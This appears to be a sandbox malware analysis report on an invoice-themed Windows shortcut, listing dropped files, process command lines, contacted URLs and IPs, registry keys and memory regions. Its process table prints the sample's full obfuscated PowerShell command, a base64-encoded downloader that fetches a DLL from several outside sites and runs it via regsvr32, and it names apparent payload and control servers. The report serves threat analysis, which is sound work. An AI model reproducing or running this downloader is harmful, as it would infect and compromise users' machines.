Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
RechnungsDetails 2022.20.05_1044.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon
number=134, Archive, ctime=Fri Feb 4 06:07:07 2022, mtime=Thu May 19 18:45:55 2022, atime=Fri Feb 4 06:07:07 2022, length=289792,
window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCP
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xcd192033, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtms2noi.pps.psm1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvcdsjdc.j3a.ps1
|
very short file (no magic)
|
dropped
|
||
|
C:\Users\user\Documents\20220523\PowerShell_transcript.580913.ffZmUZc7.20220523085407.txt
|
UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\System32\ZrCipB\RLcE.dll (copy)
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\cmd.exe
|
C:\Windows\System32\cmd.exe" /v:on /c zlkGA07kqp/HVSJK6L7RjY+ay04qYhLTdlRQkqIXeTfVVJIU9NeSf/9YcHLfxyd+ETRqdB8X||p^o^w^e^r^s^h^e^l^l.e^x^e
-c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI);
iex ($TcqkRL)}
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI);
iex ($TcqkRL)}"
|
|
|
|
C:\Windows\System32\regsvr32.exe
|
"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP
|
|
|
|
C:\Windows\System32\regsvr32.exe
|
C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZrCipB\RLcE.dll"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p
|
There are 1 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://www.jsonsintl.com/
|
unknown
|
|
|
|
http://digitalkitchen.jp/images/PVn/
|
unknown
|
|
|
|
https://173.82.82.196/hU
|
unknown
|
|
|
|
https://173.82.82.196/
|
unknown
|
|
|
|
http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/
|
unknown
|
|
|
|
https://173.82.82.196:8080/s64
|
unknown
|
|
|
|
http://piffl.com/piffl.com/a/ity.
|
unknown
|
|
|
|
http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/
|
98.142.105.106
|
|
|
|
http://jsonsintl.com
|
unknown
|
|
|
|
https://173.82.82.196:8080/
|
unknown
|
|
|
|
http://piffl.com/piffl.com/a/
|
unknown
|
|
|
|
https://173.82.82.196:8080/tem
|
unknown
|
|
|
|
https://nakharinitwebhosting.com/HSDYKN1X5GLF/
|
unknown
|
|
|
|
http://www.jsonsintl.com
|
unknown
|
|
|
|
http://www.jsonsintl.comx
|
unknown
|
|
|
|
https://www.disneyplus.com/legal/your-california-privacy-rights
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
https://www.tiktok.com/legal/report/feedback
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://support.hotspotshield.com/
|
unknown
|
||
|
https://www.disneyplus.com/legal/privacy-policy
|
unknown
|
||
|
http://crl.microsof
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://www.hotspotshield.com/terms/
|
unknown
|
||
|
https://www.pango.co/privacy
|
unknown
|
||
|
https://disneyplus.com/legal.
|
unknown
|
||
|
https://www.tiktok.com/legal/report
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
http://cmentarz.5v.pl/themes/zalMkTb/
|
unknown
|
||
|
http://help.disneyplus.com.
|
unknown
|
There are 27 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
jsonsintl.com
|
98.142.105.106
|
|
|
|
www.jsonsintl.com
|
unknown
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
173.82.82.196
|
unknown
|
United States
|
|
|
|
98.142.105.106
|
jsonsintl.com
|
United States
|
|
|
|
192.168.2.1
|
unknown
|
unknown
|
||
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
|
@%SystemRoot%\System32\ci.dll,-100
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
|
@%SystemRoot%\System32\ci.dll,-101
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
|
@%SystemRoot%\system32\dnsapi.dll,-103
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
|
@%SystemRoot%\System32\fveui.dll,-843
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
|
@%SystemRoot%\System32\fveui.dll,-844
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
|
@%SystemRoot%\System32\wuaueng.dll,-400
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
|
@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124
|
||
|
HKEY_USERSS-1-5-19\Software\Classes\Local Settings\MuiCache\f0\52C64B7E
|
@%SystemRoot%\system32\NgcRecovery.dll,-100
|
There are 13 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
180001000
|
direct allocation
|
page execute read
|
|
|
|
1E40000
|
direct allocation
|
page execute and read and write
|
|
|
|
180001000
|
direct allocation
|
page execute read
|
|
|
|
2220000
|
direct allocation
|
page execute and read and write
|
|
|
|
24DE000
|
stack
|
page read and write
|
||
|
2070000
|
remote allocation
|
page read and write
|
||
|
295583CF000
|
heap
|
page read and write
|
||
|
1F197D00000
|
trusted library allocation
|
page read and write
|
||
|
1F197E50000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92A1000
|
trusted library allocation
|
page read and write
|
||
|
1AFF9120000
|
trusted library allocation
|
page read and write
|
||
|
1F192590000
|
trusted library allocation
|
page read and write
|
||
|
295583C6000
|
heap
|
page read and write
|
||
|
1F197EAB000
|
heap
|
page read and write
|
||
|
9E5000
|
heap
|
page read and write
|
||
|
1F193002000
|
heap
|
page read and write
|
||
|
1AFF9150000
|
trusted library allocation
|
page read and write
|
||
|
1A5B474B000
|
heap
|
page read and write
|
||
|
27EE419D000
|
heap
|
page read and write
|
||
|
140000
|
heap
|
page read and write
|
||
|
1AFF9160000
|
trusted library allocation
|
page read and write
|
||
|
1AFE1D23000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1D50000
|
trusted library allocation
|
page read and write
|
||
|
7DF4AEA20000
|
trusted library allocation
|
page execute and read and write
|
||
|
1AFF9180000
|
heap
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
5EF21FE000
|
stack
|
page read and write
|
||
|
27EE4603000
|
heap
|
page read and write
|
||
|
1AFF9160000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1CA0000
|
trusted library allocation
|
page read and write
|
||
|
1AFDEF99000
|
heap
|
page read and write
|
||
|
7FF9F1E00000
|
trusted library allocation
|
page read and write
|
||
|
25DE000
|
stack
|
page read and write
|
||
|
24E0D26C000
|
heap
|
page read and write
|
||
|
1AFE1DDC000
|
trusted library allocation
|
page read and write
|
||
|
1F19263D000
|
heap
|
page read and write
|
||
|
22C9BD00000
|
heap
|
page read and write
|
||
|
1AFF907D000
|
heap
|
page read and write
|
||
|
27EE419A000
|
heap
|
page read and write
|
||
|
29558387000
|
heap
|
page read and write
|
||
|
29559200000
|
trusted library allocation
|
page read and write
|
||
|
166DC47C000
|
heap
|
page read and write
|
||
|
1A5B48C5000
|
heap
|
page read and write
|
||
|
1AFDF013000
|
heap
|
page read and write
|
||
|
1AFF92A8000
|
trusted library allocation
|
page read and write
|
||
|
27EE417B000
|
heap
|
page read and write
|
||
|
1F193810000
|
trusted library section
|
page readonly
|
||
|
27EE418D000
|
heap
|
page read and write
|
||
|
24D1DC02000
|
heap
|
page read and write
|
||
|
AF15E7C000
|
stack
|
page read and write
|
||
|
7FF9F1A80000
|
trusted library allocation
|
page read and write
|
||
|
1AFF9150000
|
trusted library allocation
|
page read and write
|
||
|
27EE36EE000
|
heap
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
22C9BE74000
|
heap
|
page read and write
|
||
|
1A5B476E000
|
heap
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF8EE1000
|
heap
|
page read and write
|
||
|
166DC513000
|
heap
|
page read and write
|
||
|
2070000
|
remote allocation
|
page read and write
|
||
|
24D1DD08000
|
heap
|
page read and write
|
||
|
585000
|
heap
|
page read and write
|
||
|
1AFE1BC6000
|
trusted library allocation
|
page read and write
|
||
|
22C9BF02000
|
heap
|
page read and write
|
||
|
27EE4183000
|
heap
|
page read and write
|
||
|
1AFE0B90000
|
heap
|
page read and write
|
||
|
193DFDE000
|
stack
|
page read and write
|
||
|
1F193113000
|
heap
|
page read and write
|
||
|
27EE419C000
|
heap
|
page read and write
|
||
|
7FF9F1D40000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92B0000
|
trusted library allocation
|
page read and write
|
||
|
1F197D30000
|
trusted library allocation
|
page read and write
|
||
|
166DC502000
|
heap
|
page read and write
|
||
|
5A0000
|
heap
|
page read and write
|
||
|
1F198060000
|
remote allocation
|
page read and write
|
||
|
27EE41B2000
|
heap
|
page read and write
|
||
|
27EE4189000
|
heap
|
page read and write
|
||
|
1AFF9130000
|
trusted library allocation
|
page read and write
|
||
|
166DC44D000
|
heap
|
page read and write
|
||
|
295582B0000
|
heap
|
page read and write
|
||
|
1AFF94E0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1D10000
|
trusted library allocation
|
page read and write
|
||
|
1AFF9150000
|
trusted library allocation
|
page read and write
|
||
|
27EE4174000
|
heap
|
page read and write
|
||
|
166DC1B0000
|
heap
|
page read and write
|
||
|
1F00000
|
trusted library allocation
|
page read and write
|
||
|
1F193118000
|
heap
|
page read and write
|
||
|
1AFE1D2C000
|
trusted library allocation
|
page read and write
|
||
|
1F19266E000
|
heap
|
page read and write
|
||
|
27EE4183000
|
heap
|
page read and write
|
||
|
F9FDEFE000
|
stack
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
1F197D24000
|
trusted library allocation
|
page read and write
|
||
|
7FFA52460000
|
unkown
|
page readonly
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF9520000
|
trusted library allocation
|
page read and write
|
||
|
F9FDCF7000
|
stack
|
page read and write
|
||
|
27EE36A4000
|
heap
|
page read and write
|
||
|
D1D2DFB000
|
stack
|
page read and write
|
||
|
9DD3AFF000
|
stack
|
page read and write
|
||
|
1F197E63000
|
heap
|
page read and write
|
||
|
590000
|
heap
|
page readonly
|
||
|
166DC402000
|
heap
|
page read and write
|
||
|
7FF9F1B20000
|
trusted library allocation
|
page read and write
|
||
|
24E0D308000
|
heap
|
page read and write
|
||
|
F9FD8FD000
|
stack
|
page read and write
|
||
|
2380000
|
heap
|
page read and write
|
||
|
193F38F000
|
stack
|
page read and write
|
||
|
1F1937C0000
|
trusted library section
|
page readonly
|
||
|
960000
|
heap
|
page readonly
|
||
|
1AFF90A8000
|
heap
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
166DC1C0000
|
heap
|
page read and write
|
||
|
1F193015000
|
heap
|
page read and write
|
||
|
7FFA5248F000
|
unkown
|
page readonly
|
||
|
1AFE0EE1000
|
trusted library allocation
|
page read and write
|
||
|
7FFA5248F000
|
unkown
|
page readonly
|
||
|
1F197E85000
|
heap
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
27EE4174000
|
heap
|
page read and write
|
||
|
24D1E602000
|
trusted library allocation
|
page read and write
|
||
|
1AFF9140000
|
trusted library allocation
|
page read and write
|
||
|
1AFF9170000
|
trusted library allocation
|
page read and write
|
||
|
1AFF9170000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
5C6000
|
stack
|
page read and write
|
||
|
1F197E4C000
|
heap
|
page read and write
|
||
|
1F193800000
|
trusted library section
|
page readonly
|
||
|
1AFE1B7B000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92C0000
|
trusted library allocation
|
page read and write
|
||
|
166DC44A000
|
heap
|
page read and write
|
||
|
1AFE1DD4000
|
trusted library allocation
|
page read and write
|
||
|
27EE4602000
|
heap
|
page read and write
|
||
|
22C9BD70000
|
heap
|
page read and write
|
||
|
27EE419C000
|
heap
|
page read and write
|
||
|
245C000
|
stack
|
page read and write
|
||
|
295582F5000
|
heap
|
page read and write
|
||
|
22C9BF00000
|
heap
|
page read and write
|
||
|
556397E000
|
stack
|
page read and write
|
||
|
1AFE1BAD000
|
trusted library allocation
|
page read and write
|
||
|
1000FE000
|
stack
|
page read and write
|
||
|
24D1DC3C000
|
heap
|
page read and write
|
||
|
60D000
|
heap
|
page read and write
|
||
|
18002D000
|
direct allocation
|
page read and write
|
||
|
1A5B476E000
|
heap
|
page read and write
|
||
|
AF1607D000
|
stack
|
page read and write
|
||
|
A1B000
|
heap
|
page read and write
|
||
|
7FFA5248B000
|
unkown
|
page read and write
|
||
|
5E2000
|
heap
|
page read and write
|
||
|
1AFF9171000
|
trusted library allocation
|
page read and write
|
||
|
1F197EFC000
|
heap
|
page read and write
|
||
|
1AFE206E000
|
trusted library allocation
|
page read and write
|
||
|
27EE4602000
|
heap
|
page read and write
|
||
|
1AFDF160000
|
heap
|
page read and write
|
||
|
27EE3678000
|
heap
|
page read and write
|
||
|
1AFF92D0000
|
trusted library allocation
|
page read and write
|
||
|
9DD31FE000
|
stack
|
page read and write
|
||
|
60D000
|
heap
|
page read and write
|
||
|
27EE34D0000
|
heap
|
page read and write
|
||
|
193F2CE000
|
stack
|
page read and write
|
||
|
166DC413000
|
heap
|
page read and write
|
||
|
D1D28BC000
|
stack
|
page read and write
|
||
|
1AFF9140000
|
trusted library allocation
|
page read and write
|
||
|
1AFE1B84000
|
trusted library allocation
|
page read and write
|
||
|
27EE417A000
|
heap
|
page read and write
|
||
|
1A5B476E000
|
heap
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
A1C000
|
heap
|
page read and write
|
||
|
166DC454000
|
heap
|
page read and write
|
||
|
27EE41AD000
|
heap
|
page read and write
|
||
|
1F197E2D000
|
heap
|
page read and write
|
||
|
24D1DC81000
|
heap
|
page read and write
|
||
|
1AFE1AF8000
|
trusted library allocation
|
page read and write
|
||
|
27EE3E90000
|
remote allocation
|
page read and write
|
||
|
9DD367E000
|
stack
|
page read and write
|
||
|
1F197D20000
|
trusted library allocation
|
page read and write
|
||
|
1F1937E0000
|
trusted library section
|
page readonly
|
||
|
1AFF9150000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1D30000
|
trusted library allocation
|
page read and write
|
||
|
24E0D1D0000
|
trusted library allocation
|
page read and write
|
||
|
180000000
|
direct allocation
|
page read and write
|
||
|
27EE417D000
|
heap
|
page read and write
|
||
|
1AFE0A60000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
24D1DC8C000
|
heap
|
page read and write
|
||
|
18002E000
|
direct allocation
|
page readonly
|
||
|
1F197DD0000
|
trusted library allocation
|
page read and write
|
||
|
27EE41DB000
|
heap
|
page read and write
|
||
|
1F193159000
|
heap
|
page read and write
|
||
|
22C9BE6F000
|
heap
|
page read and write
|
||
|
24D1DAE0000
|
heap
|
page read and write
|
||
|
27EE36B5000
|
heap
|
page read and write
|
||
|
22C9BE3C000
|
heap
|
page read and write
|
||
|
27EE4189000
|
heap
|
page read and write
|
||
|
1AFF9140000
|
trusted library allocation
|
page read and write
|
||
|
1F197D30000
|
trusted library allocation
|
page read and write
|
||
|
27EE41B2000
|
heap
|
page read and write
|
||
|
1AFF9170000
|
trusted library allocation
|
page read and write
|
||
|
F9FDDFE000
|
stack
|
page read and write
|
||
|
27EE4174000
|
heap
|
page read and write
|
||
|
5EF20FB000
|
stack
|
page read and write
|
||
|
1AFF9140000
|
trusted library allocation
|
page read and write
|
||
|
27EE36AC000
|
heap
|
page read and write
|
||
|
1F193000000
|
heap
|
page read and write
|
||
|
27EE4186000
|
heap
|
page read and write
|
||
|
29559260000
|
trusted library allocation
|
page read and write
|
||
|
1A5B4786000
|
heap
|
page read and write
|
||
|
667000
|
heap
|
page read and write
|
||
|
1AFF92B0000
|
trusted library allocation
|
page read and write
|
||
|
27EE419E000
|
heap
|
page read and write
|
||
|
1F19268E000
|
heap
|
page read and write
|
||
|
1AFE10F0000
|
trusted library allocation
|
page read and write
|
||
|
27EE418D000
|
heap
|
page read and write
|
||
|
1AFF92B0000
|
trusted library allocation
|
page read and write
|
||
|
F9FD97E000
|
stack
|
page read and write
|
||
|
9E0000
|
heap
|
page read and write
|
||
|
29559210000
|
trusted library allocation
|
page read and write
|
||
|
193E6FE000
|
stack
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
24D1DB50000
|
heap
|
page read and write
|
||
|
27EE4189000
|
heap
|
page read and write
|
||
|
18002C000
|
direct allocation
|
page readonly
|
||
|
667000
|
heap
|
page read and write
|
||
|
9DD36FE000
|
stack
|
page read and write
|
||
|
166DC451000
|
heap
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
28DE000
|
stack
|
page read and write
|
||
|
1F192560000
|
heap
|
page read and write
|
||
|
27EE3613000
|
heap
|
page read and write
|
||
|
1F192693000
|
heap
|
page read and write
|
||
|
22C9BE13000
|
heap
|
page read and write
|
||
|
27EE415C000
|
heap
|
page read and write
|
||
|
5F0000
|
remote allocation
|
page read and write
|
||
|
980000
|
heap
|
page read and write
|
||
|
1AFF92B0000
|
trusted library allocation
|
page read and write
|
||
|
681000
|
heap
|
page read and write
|
||
|
27EE4002000
|
heap
|
page read and write
|
||
|
1AFF9170000
|
trusted library allocation
|
page read and write
|
||
|
A1C777F000
|
stack
|
page read and write
|
||
|
1F00000
|
trusted library allocation
|
page read and write
|
||
|
27EE362C000
|
heap
|
page read and write
|
||
|
1AFDF07E000
|
heap
|
page read and write
|
||
|
A1F000
|
heap
|
page read and write
|
||
|
5A8000
|
heap
|
page read and write
|
||
|
27EE41CF000
|
heap
|
page read and write
|
||
|
295582F0000
|
heap
|
page read and write
|
||
|
1AFF95B0000
|
trusted library allocation
|
page read and write
|
||
|
248C000
|
stack
|
page read and write
|
||
|
1008FC000
|
stack
|
page read and write
|
||
|
27EE417C000
|
heap
|
page read and write
|
||
|
7FF9F1CB0000
|
trusted library allocation
|
page read and write
|
||
|
24D1DC5C000
|
heap
|
page read and write
|
||
|
AF161F8000
|
stack
|
page read and write
|
||
|
24E0D255000
|
heap
|
page read and write
|
||
|
7FF9F1D70000
|
trusted library allocation
|
page read and write
|
||
|
5EF23FD000
|
stack
|
page read and write
|
||
|
1AFE2077000
|
trusted library allocation
|
page read and write
|
||
|
295583C6000
|
heap
|
page read and write
|
||
|
193E87B000
|
stack
|
page read and write
|
||
|
1AFF9170000
|
trusted library allocation
|
page read and write
|
||
|
988000
|
heap
|
page read and write
|
||
|
7FF9F1C2C000
|
trusted library allocation
|
page read and write
|
||
|
24E0D200000
|
heap
|
page read and write
|
||
|
7FFA52461000
|
unkown
|
page execute read
|
||
|
7FF9F1C52000
|
trusted library allocation
|
page read and write
|
||
|
27EE3658000
|
heap
|
page read and write
|
||
|
F9FDB7B000
|
stack
|
page read and write
|
||
|
1F1926FC000
|
heap
|
page read and write
|
||
|
193E7FC000
|
stack
|
page read and write
|
||
|
1AFE0A30000
|
trusted library allocation
|
page read and write
|
||
|
1AFF8FF0000
|
heap
|
page read and write
|
||
|
24D1DC00000
|
heap
|
page read and write
|
||
|
27EE34C0000
|
heap
|
page read and write
|
||
|
7FF9F1C90000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1DA0000
|
trusted library allocation
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
27EE36EA000
|
heap
|
page read and write
|
||
|
193F34D000
|
stack
|
page read and write
|
||
|
27EE4602000
|
heap
|
page read and write
|
||
|
1F192500000
|
heap
|
page read and write
|
||
|
7FF9F1A70000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
7FF9F1D07000
|
trusted library allocation
|
page read and write
|
||
|
55638F8000
|
stack
|
page read and write
|
||
|
29558150000
|
heap
|
page read and write
|
||
|
24E0D313000
|
heap
|
page read and write
|
||
|
29558FC0000
|
trusted library allocation
|
page read and write
|
||
|
295B000
|
stack
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
27EE418B000
|
heap
|
page read and write
|
||
|
AF15F7D000
|
stack
|
page read and write
|
||
|
1AFF95C0000
|
trusted library allocation
|
page read and write
|
||
|
1F197E3F000
|
heap
|
page read and write
|
||
|
1F198040000
|
trusted library allocation
|
page read and write
|
||
|
1F30000
|
heap
|
page read and write
|
||
|
5EF1BFB000
|
stack
|
page read and write
|
||
|
27EE418B000
|
heap
|
page read and write
|
||
|
27EE419C000
|
heap
|
page read and write
|
||
|
1AFF92D0000
|
trusted library allocation
|
page read and write
|
||
|
1F198010000
|
trusted library allocation
|
page read and write
|
||
|
1A5B4710000
|
heap
|
page read and write
|
||
|
1001FE000
|
stack
|
page read and write
|
||
|
27EE36FD000
|
heap
|
page read and write
|
||
|
166DC43C000
|
heap
|
page read and write
|
||
|
7FF9F1A83000
|
trusted library allocation
|
page read and write
|
||
|
1AFDF190000
|
heap
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
420000
|
remote allocation
|
page read and write
|
||
|
F9FDBFE000
|
stack
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92B0000
|
trusted library allocation
|
page read and write
|
||
|
1AFF92A0000
|
trusted library allocation
|
page read and write
|
||
|
27EE3E90000
|
remote allocation
|
page read and write
|
||
|
1F1937D0000
|
trusted library section
|
page readonly
|
||
|
193E678000
|
stack
|
page read and write
|
||
|
925000
|
heap
|
page read and write
|
||
|
1AFE1D4E000
|
trusted library allocation
|
page read and write
|
||
|
27EE417D000
|
heap
|
page read and write
|
||
|
1AFF92A0000
|
